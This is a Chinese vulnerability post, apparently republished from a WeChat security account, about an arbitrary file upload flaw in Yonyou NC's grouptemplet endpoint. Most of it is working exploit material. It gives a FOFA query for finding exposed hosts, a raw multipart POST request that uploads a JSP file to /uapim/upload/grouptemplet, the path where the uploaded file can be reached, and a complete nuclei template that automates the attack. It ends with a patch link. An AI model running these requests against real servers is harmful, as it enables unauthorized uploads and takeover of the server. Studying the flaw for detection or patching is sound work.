用友NC grouptemplet 任意文件上传漏洞

admin

104594
文章

87
评论

2024年4月29日12:00:54评论39 views字数 2246阅读7分29秒阅读模式

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

次条通常是广告，内容我也没验证，感兴趣的自行验证，不感兴趣的忽略。

—

漏洞名称

用友NC grouptemplet 任意文件上传漏洞

—

漏洞影响

用友NC 版本不详

—

漏洞描述

用友NC是大型企业管理与电子商务平台，帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心（C2B）；从流程驱动转向数据驱动（DDE）；从延时运行转为实时运行（RTE）；从领导指挥到员工创新（E2M）。用友NC grouptemplet接口处存在任意文件上传漏洞，攻击者通过漏洞可以获取网站权限，导致服务器失陷。

—

FOFA搜索语句

icon_hash="1085941792"

用友NC grouptemplet 任意文件上传漏洞

—

漏洞复现

POC

POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Connection: closeContent-Length: 268Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgkAccept-Encoding: gzip------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgkContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"Content-Type: application/octet-stream<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

回显路径

/uapim/static/pages/nc/head.jsp

—

nuclei poc

poc文件内容如下

id: yonyou-nc-grouptemplet-fileuploadinfo:  name: 用友NC grouptemplet 任意文件上传漏洞  author: fgz  severity: critical  description: |    用友NC是大型企业管理与电子商务平台，帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心（C2B）；从流程驱动转向数据驱动（DDE）；从延时运行转为实时运行（RTE）；从领导指挥到员工创新（E2M）。用友NC grouptemplet接口处存在任意文件上传漏洞，攻击者通过漏洞可以获取网站权限，导致服务器失陷。  reference:    none  metadata:    verified: true    max-request: 2    fofa-query: icon_hash="1085941792"  tags: yonyou,nc,fileupload,2024variables:  boundary: '{{rand_base(29)}}'http:  - raw:      - |        POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36        Content-type: multipart/form-data; boundary=----------{{boundary}}        ------------{{boundary}}        Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.jsp"        Content-Type: application/octet-stream        <%out.println("{{randstr_2}}");%>        ------------{{boundary}}--      - |        GET /uapim/static/pages/nc/head.jsp HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded        Accept-Encoding: gzip    req-condition: true    matchers:      - type: dsl        dsl:          - "status_code_1 == 200"          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"        condition: and

—

修复建议

升级到最新版本。

用友安全中心补丁连接

https://security.yonyou.com/#/patchList

原文始发于微信公众号（AI与网安）：用友NC grouptemplet 任意文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

用友NC grouptemplet 任意文件上传漏洞

漏洞复现 || Palo Alto Networks PAN-OS GlobalProtect 命令注入

瑞友天翼应用虚拟化系统RCE漏洞

CVE-2023-32315：Openfire身份认证绕过漏洞

ECTouch 电商系统SQL注入

JeecgBoot SSTI rce 漏洞

【漏洞预警】Microsoft Windows Themes 远程代码执行漏洞CVE-2023-38146

【漏洞预警】JumpServer 会话录像文件未授权访问漏洞 CVE-2023-42442

CVE-2023-36076 RCE漏洞（附EXP）

【严重漏洞】WordPress插件User Submitted Posts任意文件上传漏洞

【风险通告】JumpServer Session 未授权访问漏洞(CVE-2023-42442)

发表评论

在线咨询

微信